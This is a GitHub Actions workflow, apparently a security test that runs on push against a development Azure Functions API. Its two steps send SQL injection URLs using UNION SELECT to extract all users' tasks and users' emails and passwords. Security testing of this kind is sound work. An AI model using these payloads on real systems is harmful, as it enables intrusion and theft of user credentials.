name: SQL-Injection-Test-User-Tasks
on:
  push:

jobs:
  injection-test:
    name: SQL Inject on GET to fetch all user Tasks
    runs-on: ubuntu-latest

    steps:
    - name: GET all users tasks
      uses: distributor/workflow-webhook
      with:
        url: "https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/1 UNION SELECT taskId, taskUserId, title, taskDescription FROM tasks/tasks"
    - name: GET all users email and passwords
      uses: distributor/workflow-webhook
      with:
        url: "https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/1 UNION SELECT userid, userid, email, userpassword FROM users/tasks"